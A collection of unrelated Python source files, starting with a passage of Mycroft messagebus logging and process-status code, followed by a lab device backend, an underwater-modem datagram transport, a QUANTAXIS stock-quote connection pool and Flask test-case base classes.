LOG(name).info("Bus logging: {}".format(log_bus))
_log_all_bus_messages = log_bus
def create_echo_function(name, whitelist=None):
"""Standard logging mechanism for Mycroft processes.
This handles the setup of the basic logging for all Mycroft
messagebus-based processes.
TODO 20.08: extract log level setting thing completely from this function
Args:
name (str): Reference name of the process
whitelist (list, optional): List of "type" strings. If defined, only
messages in this list will be logged.
Returns:
func: The echo function
"""
from mycroft.configuration import Configuration
blacklist = Configuration.get().get("ignore_logs")
# Make sure whitelisting doesn't remove the log level setting command
if whitelist:
whitelist.append('mycroft.debug.log')
def echo(message):
global _log_all_bus_messages
try:
msg = json.loads(message)
msg_type = msg.get("type", "")
# Whitelist match beginning of message
            # i.e. 'mycroft.audio.service' will allow the message
# 'mycroft.audio.service.play' for example
if whitelist and not any([msg_type.startswith(e)
for e in whitelist]):
return
if blacklist and msg_type in blacklist:
return
if msg_type == "mycroft.debug.log":
_update_log_level(msg, name)
elif msg_type == "registration":
# do not log tokens from registration messages
msg["data"]["token"] = None
message = json.dumps(msg)
except Exception as e:
LOG.info("Error: {}".format(repr(e)), exc_info=True)
if _log_all_bus_messages:
# Listen for messages and echo them for logging
LOG(name).info("BUS: {}".format(message))
return echo
def start_message_bus_client(service, bus=None, whitelist=None):
"""Start the bus client daemon and wait for connection.
Args:
service (str): name of the service starting the connection
bus (MessageBusClient): an instance of the Mycroft MessageBusClient
whitelist (list, optional): List of "type" strings. If defined, only
messages in this list will be logged.
Returns:
A connected instance of the MessageBusClient
"""
# Local imports to avoid circular importing
from mycroft.messagebus.client import MessageBusClient
from mycroft.configuration import Configuration
# Create a client if one was not provided
if bus is None:
bus = MessageBusClient()
Configuration.set_config_update_handlers(bus)
bus_connected = Event()
bus.on('message', create_echo_function(service, whitelist))
# Set the bus connected event when connection is established
bus.once('open', bus_connected.set)
create_daemon(bus.run_forever)
# Wait for connection
bus_connected.wait()
LOG.info('Connected to messagebus')
return bus
class ProcessState(IntEnum):
"""Oredered enum to make state checks easy.
For example Alive can be determined using >= ProcessState.ALIVE,
which will return True if the state is READY as well as ALIVE.
"""
NOT_STARTED = 0
STARTED = 1
ERROR = 2
STOPPING = 3
ALIVE = 4
READY = 5
# Process state change callback mappings.
_STATUS_CALLBACKS = [
'on_started',
'on_alive',
'on_ready',
'on_error',
'on_stopping',
]
# namedtuple defaults only available on 3.7 and later python versions
if sys.version_info < (3, 7):
StatusCallbackMap = namedtuple('CallbackMap', _STATUS_CALLBACKS)
StatusCallbackMap.__new__.__defaults__ = (None,) * 5
else:
StatusCallbackMap = namedtuple(
'CallbackMap',
_STATUS_CALLBACKS,
defaults=(None,) * len(_STATUS_CALLBACKS),
)
class ProcessStatus:
"""Process status tracker.
    The class tracks process status, executes callback methods on
    state changes and replies to messagebus queries about the
    process status.
Args:
name (str): process name, will be used to create the messagebus
messagetype "mycroft.{name}...".
bus (MessageBusClient): Connection to the Mycroft messagebus.
callback_map (StatusCallbackMap): optionally, status callbacks for the
various status changes.
"""
def __init__(self, name, bus, callback_map=None):
# Messagebus connection
self.bus = bus
self.name = name
self.callbacks = callback_map or StatusCallbackMap()
self.state = ProcessState.NOT_STARTED
self._register_handlers()
def _register_handlers(self):
"""Register messagebus handlers for status queries."""
self.bus.on('mycroft.{}.is_alive'.format(self.name), self.check_alive)
self.bus.on('mycroft.{}.is_ready'.format(self.name),
self.check_ready)
# The next one is for backwards compatibility
# TODO: remove in 21.02
self.bus.on(
'mycroft.{}.all_loaded'.format(self.name), self.check_ready
)
def check_alive(self, message=None):
"""Respond to is_alive status request.
Args:
message: Optional message to respond to, if omitted no message
is sent.
Returns:
bool, True if process is alive.
"""
is_alive = self.state >= ProcessState.ALIVE
if message:
status = {'status': is_alive}
self.bus.emit(message.response(data=status))
return is_alive
def check_ready(self, message=None):
"""Respond to all_loaded status request.
Args:
message: Optional message to respond to, if omitted no message
is sent.
Returns:
bool, True if process is ready.
"""
is_ready = self.state >= ProcessState.READY
if message:
status = {'status': is_ready}
self.bus.emit(message.response(data=status))
return is_ready
def set_started(self):
"""Process is started."""
self.state = ProcessState.STARTED
if self.callbacks.on_started:
self.callbacks.on_started()
def set_alive(self):
"""Basic loading is done."""
self.state = ProcessState.ALIVE
if self.callbacks.on_alive:
self.callbacks.on_alive()
def set_ready(self):
"""All loading is done."""
self.state = ProcessState.READY
if self.callbacks.on_ready:
self.callbacks.on_ready()
def set_stopping(self):
"""Process shutdown has started."""
self.state = ProcessState.STOPPING
if self.callbacks.on_stopping:
self.callbacks.on_stopping()
def set_error(self, err=''):
"""An error has occured and the process is non-functional."""
# Intentionally leave is_started True
self.state = ProcessState.ERROR
if self.callbacks.on_error:
self.callbacks.on_error(err)
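# Usage sketch (illustrative; assumes a connected MessageBusClient `bus`):
#
#   callbacks = StatusCallbackMap(on_ready=lambda: LOG.info('ready'))
#   status = ProcessStatus('audio', bus, callback_map=callbacks)
#   status.set_started()
#   ...   # do the loading work
#   status.set_alive()
#   ...   # finish loading
#   status.set_ready()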
|
kpa_backend.py
|
from oai_kpa_stm_data import OaiKpaSTM
from oia_kpa_power_data import OaiKpaPower
from oai_kpa_mpp_data import OaiKpaMPP
from oai_kpa_interface import OaiDigitalModule
import time
import json
import threading
class DeviceBackend:
def __init__(self, **kwargs):
self.stm_id = kwargs.get('stm_id', '20713699424D')
self.bdd_id = kwargs.get('bdd_id', '20643699424D')
self.be_id = kwargs.get('be_id', '20523688424D')
self.mku_id = kwargs.get('mku_id', '20713699424D')
self.dep_id = kwargs.get('dep_id', '207F369F424D')
self.interface_id = kwargs.get('interface_id', '20703699424D')
self.write_period_ms = 300
self.thread_daemon_mode = kwargs.get('thread_daemon_mode', False)
self.stm = None
self.bdd = None
self.be = None
self.dep = None
self.mku = None
self.mko = None
self.interface = None
self.parser_thread = None
self.thread_flag = False
def connect(self):
self.stm = OaiKpaSTM(serial_num=self.stm_id)
self.stm.connect(serial_num=self.stm_id)
self.bdd = OaiKpaPower(serial_num=self.bdd_id)
self.bdd.connect(serial_num=self.bdd_id)
self.bdd.test_init()
self.be = OaiKpaPower(serial_num=self.be_id)
self.be.connect(serial_num=self.be_id)
self.be.test_init()
self.dep = OaiKpaMPP(serial_num=self.dep_id)
self.dep.connect()
self.interface = OaiDigitalModule(serial_num=self.interface_id)
self.interface.connect()
self.start_parser_thread()
def start_parser_thread(self):
self.parser_thread = threading.Thread(target=self.parser, daemon=self.thread_daemon_mode)
self.thread_flag = True
self.parser_thread.start()
def stop_parser_thread(self):
self.thread_flag = False
self.parser_thread = None
def parser(self):
while self.thread_flag:
with open('src/json/view_model.json', 'r+', encoding='utf8') as f:
d = json.load(f)
d['stm']['connection_status'] = True if self.stm.state == 1 else False
stm_data = self.stm.get_channels_values()
for model_data, stm_value, stm_state in zip(d['stm']['table1']['data'], stm_data[0][:3], stm_data[1][:3]):
model_data['value'] = float("{:.2f}".format(stm_value))
model_data['state'] = stm_state
for model_data, stm_value, stm_state in zip(d['stm']['table2']['data'], stm_data[0][3:12], stm_data[1][3:12]):
model_data['value'] = float("{:.2f}".format(stm_value))
model_data['state'] = stm_state
for model_data, stm_value, stm_state in zip(d['stm']['table3']['data'], stm_data[0][12:24], stm_data[1][12:24]):
model_data['value'] = float("{:.2f}".format(stm_value))
model_data['state'] = stm_state
bdd_voltage = self.bdd.client.ai_register_map[2141] * 0.00125
bdd_current = self.bdd.client.ai_register_map[2142]
d['power']['bdd']['connection_status'] = True if self.bdd.state == 1 else False
d['power']['bdd']['on_state'] = True if self.bdd.on_off == 1 else False
d['power']['bdd']['voltage'] = float("{:.2f}".format(bdd_voltage))
d['power']['bdd']['current'] = float(bdd_current)
d['power']['bdd']['power'] = float("{:.2f}".format(bdd_voltage * bdd_current))
be_voltage = self.be.client.ai_register_map[2141] * 0.00125
be_current = self.be.client.ai_register_map[2142]
d['power']['be']['connection_status'] = True if self.be.state == 1 else False
                d['power']['be']['on_state'] = True if self.be.on_off == 1 else False
d['power']['be']['voltage'] = float("{:.2f}".format(be_voltage))
d['power']['be']['current'] = be_current
d['power']['be']['power'] = float("{:.2f}".format(be_voltage * be_current))
d['dep']['connection_status'] = True if self.dep.state == 1 else False
d['interface']['connection_status'] = True if self.interface.state == 1 else False
docking_control = self.get_docking_control()
print(docking_control)
d['stm']['table4']['data'][0]['value'] = docking_control[0]
d['stm']['table4']['data'][0]['state'] = docking_control[1]
f.seek(0)
json.dump(d, f, indent=4, ensure_ascii=False)
f.truncate()
time.sleep(self.write_period_ms / 1000)
def power_set_voltage(self, module='bdd', voltage=27):
if module == 'bdd':
self.bdd.voltage_expected = voltage * 1000
self.bdd.voltage_set()
elif module == 'be':
self.be.voltage_expected = voltage * 1000
self.be.voltage_set()
else:
print("ERROR: 'power_set_voltage' incorrect module")
with open('src/json/view_model.json', 'r+', encoding='utf8') as f:
d = json.load(f)
d['power'][module]['aim_voltage'] = voltage * 1000
f.seek(0)
json.dump(d, f, indent=4, ensure_ascii=False)
f.truncate()
def dep_set_voltage(self, voltage):
        if voltage in (0, -30, 30):
self.dep.DEP_control(voltage=voltage)
with open('src/json/view_model.json', 'r+', encoding='utf8') as f:
d = json.load(f)
d['dep']['voltage'] = voltage
f.seek(0)
json.dump(d, f, indent=4, ensure_ascii=False)
f.truncate()
else:
print("ERROR: dep incorrect voltage: " + voltage)
def get_docking_control(self):
val = self.interface.get_analog_inputs()[0]
state = 0
if val <= 1500:
state = 2
        elif 1500 < val < 3000:
state = 1
elif val >= 3000:
state = 0
print([val, state])
return [val, state]
if __name__ == "__main__":
backend = DeviceBackend()
backend.connect()
|
transport.py
|
# encoding=utf-8
"""
Arbitrary size data transfers for Water Linked Underwater Modems
WlUDPSocket is the interface for sending/receiving arbitrary length data (datagram) with
a Water Linked Underwater Modem.
This style of transfer is suitable for short messages and has low overhead at 3 bytes for each
datagram (1 start byte, 1 checksum and 1 end byte).
The datagram will be corrupted by any single modem packet dropped (while still taking the full time to transmit),
which means it is only suitable for short datagrams.
The Modem-M64 has a payload size of 8 bytes, so longer datagrams are split into multiple packets.
The chance of a datagram arriving successfully, for a given chance of any single packet being lost, is:
chance of success = ((100 - chance of packet loss) / 100) ** (number of packets sent) * 100
For example, with a 5% chance of packet loss and a datagram of 77 bytes (with the 3 overhead bytes this gives 10 packets):
chance of success = (1.0 - 0.05)**10 * 100 = 59.9%
Internally it uses a thread to frame, packetize and send the datagrams given via the "send" function.
When a full datagram is received by the modem it is put on a queue and can be retrieved with the "receive" function.
"""
from __future__ import division, print_function
import threading
try:
import queue
except ImportError:
import Queue as queue
import time
import sys
import logging
from abc import abstractmethod
from cobs import cobsr as cobs
import crcmod
# Logger
log = logging.getLogger(__file__)
# Python2 detection
IS_PY2 = False
if sys.version_info < (3, 0):
IS_PY2 = True
### Debug
def printable(ch):
if ch < 32:
return "."
if ch > 127:
return "."
return chr(ch)
def pretty_packet(pkt):
_hx = " ".join("{:02x}".format(x) for x in pkt)
return "[{}] {}".format(_hx, "".join([printable(x) for x in pkt]))
FRAME_END = 0 # COBS guarantees no zeros in the payload
if IS_PY2:
FRAME_END = chr(0)
# The payload is internally checksummed by the modem, but we need to detect if a packet is dropped
# so a simple CRC-8 is sufficient
crc_func = crcmod.predefined.mkPredefinedCrcFun("crc-8")
def frame(data):
""" Frame data using COBS for transmission """
crc = crc_func(data)
framed = bytearray(data)
framed.append(crc)
if IS_PY2:
framed = bytes(framed)
framed = cobs.encode(framed)
framed = bytearray(framed)
framed.append(FRAME_END)
return framed
def pad_payload(data, payload_size):
"""
    Pad data with empty COBS frames until its size equals the given payload_size
"""
send = bytearray(data)
left = payload_size - len(send)
while left >= 2:
# Pad with an (COBS) empty frame
send.append(1) # COBS Start byte
send.append(FRAME_END)
left = payload_size - len(send)
if left == 1:
# Pad with a frame end
send.append(FRAME_END)
return send
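# Example (a sketch): with payload_size 8 and 3 bytes of framed data,
# pad_payload appends the two-byte COBS empty frame (0x01, 0x00) twice and one
# final FRAME_END, so the result is exactly 8 bytes; the receiver's unframe()
# treats the empty frames as padding and ignores them.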
def unframe(buffer):
""" Decode frame and return data """
# Remove terminating 0
if buffer and buffer[-1] == 0:
buffer.pop()
if IS_PY2:
buffer = bytes(buffer)
try:
decoded = cobs.decode(buffer)
except cobs.DecodeError as err:
log.warning("MSG Decode error {}".format(err))
return False
if not decoded:
# Padding/Fill frame only, don't do anything
return None
expected_crc = decoded[-1]
data = decoded[:-1]
data_crc = crc_func(data)
if IS_PY2:
expected_crc = ord(expected_crc)
if data_crc != expected_crc:
log.warning("CRC ERR: Sender crc: {:02x} Received data crc: {:02x}".format(expected_crc, data_crc))
return False
return data
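# Round-trip sketch: for any non-empty payload `data`, unframe(frame(data)) == data.
# frame() appends a CRC-8, COBS-encodes and terminates with a zero byte;
# unframe() strips the terminator, COBS-decodes and verifies the CRC.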
class WlUDPBase(object):
"""
WlUDPBase is the base class for sending/receiving arbitrary length data with a Water Linked Underwater Modem
"""
def __init__(self, modem, desired_queue_length=2, diagnostic_poll_time=0, debug=True):
super(WlUDPBase, self).__init__()
self._tx_buf = bytearray()
self._rx_buf = bytearray()
# Reference to the wlmodem to use
self.modem = modem
# How many packets to queue in the modem at any time
self.desired_queue_length = desired_queue_length
self.debug = debug
# Periodically load diagnostic and store it in the object for the user
# to be able to refer to it
self.diagnostic = dict()
# How often do we update the diagnostic
self.diagnostic_poll_time = diagnostic_poll_time
# Timestamp for next update of diagnostic
self._diagnostic_timeout = 0
@property
def payload_size(self):
return self.modem.payload_size
def _run_send(self):
""" Check if we need to add more data to the modem for transmission """
if self.modem.cmd_get_queue_length() < self.desired_queue_length:
# Tx queue on modem is getting low, lets add another packet
if len(self._tx_buf) < self.payload_size:
# The transmit buffer is less than the payload, let's load more data
self._fill_tx_buf()
# Check if we have anything to transmit
if self._tx_buf:
# Get the next packet to transmit
send = self._get_next_tx_packet()
# Queue the packet
if self.debug:
log.info("Queing packet {}".format(pretty_packet(send)))
self.modem.cmd_queue_packet(send)
if self.diagnostic_poll_time > 0 and time.time() > self._diagnostic_timeout:
# Update diagnostic data if enabled and we have timed out
self.diagnostic = self.modem.cmd_get_diagnostic()
self._diagnostic_timeout = time.time() + self.diagnostic_poll_time
def _run_receive(self):
""" Check if we have gotten any new data from the modem """
received = self.modem.get_data_packet(0)
if received:
if self.debug:
log.info("Got packet {}".format(pretty_packet(received)))
self._rx_buf.extend(received)
# If we have a \0 we got a datagram
if self._rx_buf.find(FRAME_END) >= 0:
if self.debug:
log.info("Got full datagram, let's decode it")
while self._rx_buf.find(FRAME_END) >= 0:
frame = self._extract_frame_from_rx_buf()
# Remove the framing
data = unframe(frame)
if data is None:
# Fill frame only, ignore that
continue
if data:
self._fill_rx_buf(data)
else:
                        # Error occurred
if self.debug:
log.warning("MSG: Invalid")
@abstractmethod
def _fill_tx_buf(self):
""" This function is called when _tx_buf is too short to fill a packet and more data is needed"""
def _get_next_tx_packet(self):
""" Get next packet for modem to transmit """
send = self._tx_buf[:self.payload_size]
self._tx_buf = self._tx_buf[self.payload_size:]
if len(send) < self.payload_size:
# Too little data available to fill desired payload size, we need to pad it
send = pad_payload(send, self.payload_size)
return send
@abstractmethod
def _fill_rx_buf(self, data):
""" This function is called when a full datagram is received to fill the received queue """
def _extract_frame_from_rx_buf(self):
idx = self._rx_buf.find(FRAME_END)
# Extract the frame
frame = self._rx_buf[:idx]
# Remove the frame from tx_buf
self._rx_buf = self._rx_buf[idx:]
self._rx_buf.pop(0) # Remove the FRAME_END
return frame
class WlUDPSocket(WlUDPBase):
"""
Arbitrary size data transfers for Water Linked Underwater Modems
WlUDPSocket is the interface for sending/receiving arbitrary length data (datagram) with
a Water Linked Underwater Modem.
See package documentation for more details.
    Internally it uses a thread to frame, packetize and send the datagrams given via the "send" function.
When a full datagram is received by the modem it is put on a queue and can be retrieved with the "receive" function.
    Warning: Be careful of accessing the internal variables/functions (i.e. anything starting with _) since it can lead to unpredictable results.
    Warning: Calling functions on the "wlmodem" passed to this object can lead to unpredictable results since the WlUDPSocket
and your code might access the serial port at the same time.
"""
def __init__(self, modem, tx_max=0, rx_max=0, sleep_time=0.2, desired_queue_length=2, diagnostic_poll_time=0, debug=False):
"""
Initialize WlUDPSocket. Use "send" to send datagrams and "receive" to get received datagrams.
tx_max sets the number of datagrams to allow in the send queue
rx_max sets the number of datagrams to allow in the receive queue
sleep_time sets the number of seconds before checking if the modem needs more data
        debug can be set to True to enable more debug output
"""
WlUDPBase.__init__(self, modem, diagnostic_poll_time=diagnostic_poll_time, desired_queue_length=desired_queue_length, debug=debug)
self.sleep_time = sleep_time
self._tx_queue = queue.Queue(maxsize=tx_max)
self._rx_queue = queue.Queue(maxsize=rx_max)
self.run_event = threading.Event()
self.run_event.set()
self.worker = threading.Thread(target=self.run, args=())
self.worker.daemon = True
# Start thread
self.worker.start()
def send(self, data, block=False):
"""
Add datagram for transmission
        Returns True if successful, False if the queue is full
"""
try:
self._tx_queue.put(data, block=block)
return True
except queue.Full:
return False
def send_qsize(self):
"""
Return the number of datagrams which are queued but have not started
transmission yet.
"""
return self._tx_queue.qsize()
def send_flush(self):
"""
Flush send queue
"""
try:
# Flush send queue
while True:
self._tx_queue.get(block=False)
except queue.Empty:
pass
def receive(self, block=False):
""" Get datagram if one is available.
        If block is True it waits until a datagram is available and returns it.
        If the queue is empty and block is False, None is returned.
"""
try:
return self._rx_queue.get(block=block)
except queue.Empty:
return None
def receive_qsize(self):
"""
        Return the number of datagrams which have been received but not read yet.
"""
return self._rx_queue.qsize()
def receive_flush(self):
"""
Flush receive queue
"""
try:
# Flush receive queue
while True:
self._rx_queue.get(block=False)
except queue.Empty:
pass
def _fill_tx_buf(self):
try:
# Get data
data = self._tx_queue.get_nowait()
# Frame it
framed = frame(data)
# Add it to the buffer
self._tx_buf.extend(framed)
except queue.Empty:
# No more data available at this time
pass
def _fill_rx_buf(self, data):
# Got some actual data
try:
self._rx_queue.put_nowait(data)
return True
except queue.Full:
# Queue full, drop the packet
return False
def run(self):
""" Worker thread main function. You do not need to call this function, it is run automatically """
while self.run_event.is_set():
self._run_send()
self._run_receive()
time.sleep(self.sleep_time)
def stop(self):
""" Stop worker thread """
self.run_event.clear()
self.worker.join()
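# Usage sketch (illustrative; `modem` is assumed to be an already connected
# Water Linked modem object as described in the module docstring):
#
#   sock = WlUDPSocket(modem)
#   sock.send(b"hello")        # queue a datagram for transmission
#   data = sock.receive()      # poll for a received datagram (None if empty)
#   sock.stop()                # shut down the worker thread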
|
QATdx_adv.py
|
# coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2018 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import datetime
import queue
import time
from concurrent.futures import ThreadPoolExecutor
from threading import Thread, Timer
import pandas as pd
from pytdx.hq import TdxHq_API
from QUANTAXIS.QAUtil.QADate_trade import QA_util_if_tradetime
from QUANTAXIS.QAUtil.QASetting import DATABASE, info_ip_list
from QUANTAXIS.QAUtil.QASql import QA_util_sql_mongo_sort_ASCENDING
from QUANTAXIS.QAUtil.QATransform import QA_util_to_json_from_pandas
"""
准备做一个多连接的连接池执行器Executor
当持续获取数据/批量数据的时候,可以减小服务器的压力,并且可以更快的进行并行处理
"""
class QA_Tdx_Executor():
def __init__(self, thread_num=2, *args, **kwargs):
self.thread_num = thread_num
self._queue = queue.Queue(maxsize=200)
self.api_no_connection = TdxHq_API()
self._api_worker = Thread(
target=self.api_worker, args=(), name='API Worker')
self._api_worker.start()
self.executor = ThreadPoolExecutor(self.thread_num)
def __getattr__(self, item):
try:
api = self.get_available()
func = api.__getattribute__(item)
def wrapper(*args, **kwargs):
res = self.executor.submit(func, *args, **kwargs)
self._queue.put(api)
return res
return wrapper
        except Exception:
return self.__getattr__(item)
def _queue_clean(self):
self._queue = queue.Queue(maxsize=200)
def _test_speed(self, ip, port=7709):
api = TdxHq_API(raise_exception=True, auto_retry=False)
_time = datetime.datetime.now()
try:
with api.connect(ip, port, time_out=0.05):
if len(api.get_security_list(0, 1)) > 800:
return (datetime.datetime.now() - _time).total_seconds()
else:
return datetime.timedelta(9, 9, 0).total_seconds()
except Exception as e:
return datetime.timedelta(9, 9, 0).total_seconds()
def get_market(self, code):
code = str(code)
if code[0] in ['5', '6', '9'] or code[:3] in ["009", "126", "110", "201", "202", "203", "204"]:
return 1
return 0
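    # Example (sketch): get_market('600000') -> 1 and get_market('000001') -> 0,
    # matching the pytdx market codes (assumed: 1 = Shanghai, 0 = Shenzhen).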
def get_frequence(self, frequence):
if frequence in ['day', 'd', 'D', 'DAY', 'Day']:
frequence = 9
elif frequence in ['w', 'W', 'Week', 'week']:
frequence = 5
elif frequence in ['month', 'M', 'm', 'Month']:
frequence = 6
elif frequence in ['Q', 'Quarter', 'q']:
frequence = 10
elif frequence in ['y', 'Y', 'year', 'Year']:
frequence = 11
elif str(frequence) in ['5', '5m', '5min', 'five']:
frequence = 0
elif str(frequence) in ['1', '1m', '1min', 'one']:
frequence = 8
elif str(frequence) in ['15', '15m', '15min', 'fifteen']:
frequence = 1
elif str(frequence) in ['30', '30m', '30min', 'half']:
frequence = 2
elif str(frequence) in ['60', '60m', '60min', '1h']:
frequence = 3
return frequence
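    # Example (sketch): get_frequence('day') -> 9 and get_frequence('30min') -> 2;
    # these integer codes are what _get_security_bars() below passes on to pytdx.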
@property
def ipsize(self):
        return self._queue.qsize()
@property
def api(self):
return self.get_available()
def get_available(self):
if self._queue.empty() is False:
return self._queue.get_nowait()
else:
Timer(0, self.api_worker).start()
return self._queue.get()
def api_worker(self):
data = []
if self._queue.qsize() < 80:
for item in info_ip_list:
_sec = self._test_speed(item)
if _sec < 0.1:
try:
self._queue.put(TdxHq_API(heartbeat=False).connect(
ip=item, time_out=0.05))
                    except Exception:
pass
else:
self._queue_clean()
Timer(0, self.api_worker).start()
Timer(300, self.api_worker).start()
    def _signal_job(self, context, id_, code, time_out=0.5):
        try:
            _api = self.get_available()
            __data = context.append(self.api_no_connection.to_df(_api.get_security_quotes(
                [(self.get_market(x), x) for x in code[80 * id_:80 * (id_ + 1)]])))
            __data['datetime'] = datetime.datetime.now()
            self._queue.put(_api)  # return the connection to the pool
            return __data
        except Exception:
            return self._signal_job(context, id_, code)
def get_realtime(self, code):
context = pd.DataFrame()
code = [code] if type(code) is str else code
try:
for id_ in range(int(len(code) / 80) + 1):
                context = self._signal_job(context, id_, code)
data = context[['datetime', 'last_close', 'code', 'open', 'high', 'low', 'price', 'cur_vol',
's_vol', 'b_vol', 'vol', 'ask1', 'ask_vol1', 'bid1', 'bid_vol1', 'ask2', 'ask_vol2',
'bid2', 'bid_vol2', 'ask3', 'ask_vol3', 'bid3', 'bid_vol3', 'ask4',
'ask_vol4', 'bid4', 'bid_vol4', 'ask5', 'ask_vol5', 'bid5', 'bid_vol5']]
data['datetime'] = data['datetime'].apply(lambda x: str(x))
return data.set_index('code', drop=False, inplace=False)
        except Exception:
return None
def get_realtime_concurrent(self, code):
code = [code] if type(code) is str else code
try:
data = {self.get_security_quotes([(self.get_market(
x), x) for x in code[80 * pos:80 * (pos + 1)]]) for pos in range(int(len(code) / 80) + 1)}
return (pd.concat([self.api_no_connection.to_df(i.result()) for i in data]), datetime.datetime.now())
        except Exception:
pass
def get_security_bar_concurrent(self, code, _type, lens):
try:
data = {self.get_security_bars(self.get_frequence(_type), self.get_market(
str(code)), str(code), 0, lens) for code in code}
return [i.result() for i in data]
        except Exception:
            raise
def _get_security_bars(self, context, code, _type, lens):
try:
_api = self.get_available()
for i in range(1, int(lens / 800) + 2):
context.extend(_api.get_security_bars(self.get_frequence(
_type), self.get_market(str(code)), str(code), (i - 1) * 800, 800))
print(context)
self._queue.put(_api)
return context
except Exception as e:
return self._get_security_bars(context, code, _type, lens)
def get_security_bar(self, code, _type, lens):
code = [code] if type(code) is str else code
context = []
try:
for item in code:
context = self._get_security_bars(context, item, _type, lens)
return context
except Exception as e:
raise e
    def save_mongo(self, data, client=DATABASE):
        database = client.get_collection(
            'realtime_{}'.format(datetime.date.today()))
database.insert_many(QA_util_to_json_from_pandas(data))
def get_bar():
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
print(len(code))
x = QA_Tdx_Executor()
print(x._queue.qsize())
print(x.get_available())
for i in range(100000):
_time = datetime.datetime.now()
        if QA_util_if_tradetime(_time):  # if within trading hours
data = x.get_security_bar_concurrent(code, 'day', 1)
print('Time {}'.format(
(datetime.datetime.now() - _time).total_seconds()))
time.sleep(1)
print('Connection Pool NOW LEFT {} Available IP'.format(
x._queue.qsize()))
print('Program Last Time {}'.format(
(datetime.datetime.now() - _time1).total_seconds()))
else:
print('Not Trading time {}'.format(_time))
time.sleep(1)
def get_day_once():
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
x = QA_Tdx_Executor()
return x.get_security_bar_concurrent(code, 'day', 1)
def bat():
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
print(len(code))
x = QA_Tdx_Executor()
print(x._queue.qsize())
print(x.get_available())
database = DATABASE.get_collection(
'realtime_{}'.format(datetime.date.today()))
print(database)
database.create_index([('code', QA_util_sql_mongo_sort_ASCENDING),
('datetime', QA_util_sql_mongo_sort_ASCENDING)])
for i in range(100000):
_time = datetime.datetime.now()
        if QA_util_if_tradetime(_time):  # if within trading hours
data = x.get_realtime_concurrent(code)
data[0]['datetime'] = data[1]
x.save_mongo(data[0])
print('Time {}'.format(
(datetime.datetime.now() - _time).total_seconds()))
time.sleep(1)
print('Connection Pool NOW LEFT {} Available IP'.format(
x._queue.qsize()))
print('Program Last Time {}'.format(
(datetime.datetime.now() - _time1).total_seconds()))
else:
print('Not Trading time {}'.format(_time))
time.sleep(1)
if __name__ == '__main__':
import time
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
DATABASE.realtime.create_index([('code', QA_util_sql_mongo_sort_ASCENDING),
('datetime', QA_util_sql_mongo_sort_ASCENDING)])
# print(len(code))
# x = QA_Tdx_Executor()
# print(x._queue.qsize())
# print(x.get_available())
# #data = x.get_security_bars(code[0], '15min', 20)
# # print(data)
# # for i in range(5):
# # print(x.get_realtime_concurrent(code))
# for i in range(100000):
# _time = datetime.datetime.now()
    # if QA_util_if_tradetime(_time):  # if within trading hours
# #data = x.get_realtime(code)
# data = x.get_realtime_concurrent(code)
# data[0]['datetime'] = data[1]
# x.save_mongo(data[0])
# # print(code[0])
# #data = x.get_security_bars(code, '15min', 20)
# # if data is not None:
# print(len(data[0]))
# # print(data)
# print('Time {}'.format((datetime.datetime.now() - _time).total_seconds()))
# time.sleep(1)
# print('Connection Pool NOW LEFT {} Available IP'.format(x._queue.qsize()))
# print('Program Last Time {}'.format(
# (datetime.datetime.now() - _time1).total_seconds()))
# # print(threading.enumerate())
# #
|
__init__.py
|
import os
# setup testing environment before anything imports app
os.environ["FLASK_ENV"] = "test"
from pmg import app
from pmg.models import db
from flask_testing import TestCase, LiveServerTestCase
import multiprocessing
import time
import urllib.request, urllib.error, urllib.parse
class PMGTestCase(TestCase):
def create_app(self):
return app
def setUp(self):
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
class PMGLiveServerTestCase(LiveServerTestCase):
def __call__(self, result=None):
"""
        Does the required setup; doing it here means subclasses don't
        have to call super().setUp().
"""
# Get the app
self.app = self.create_app()
self.port = self.app.config.get("LIVESERVER_PORT", 5000)
self.base_url = "http://pmg.test:5000/"
# We need to create a context in order for extensions to catch up
self._ctx = self.app.test_request_context()
self._ctx.push()
try:
self._spawn_live_server()
super(LiveServerTestCase, self).__call__(result)
finally:
self._post_teardown()
self._terminate_live_server()
def _spawn_live_server(self):
self._process = None
worker = lambda app, port: app.run(port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker, args=(self.app, self.port)
)
self._process.start()
# We must wait for the server to start listening, but give up
# after a specified maximum timeout
timeout = self.app.config.get("LIVESERVER_TIMEOUT", 5)
start_time = time.time()
while True:
elapsed_time = time.time() - start_time
if elapsed_time > timeout:
raise RuntimeError(
"Failed to start the server after %d seconds. " % timeout
)
if self._can_ping_server():
break
def create_app(self):
# https://stackoverflow.com/a/38529331/1305080
db.engine.dispose()
return app
def setUp(self):
db.create_all()
self.created_objects = []
def tearDown(self):
db.session.remove()
db.drop_all()
def make_request(self, path, user=None, **args):
"""
Make a request to the test app (optionally with a user session).
Args:
path: Endpoint to make the request to.
user: User to make the request as.
Keyword arguments are passed on to the test client
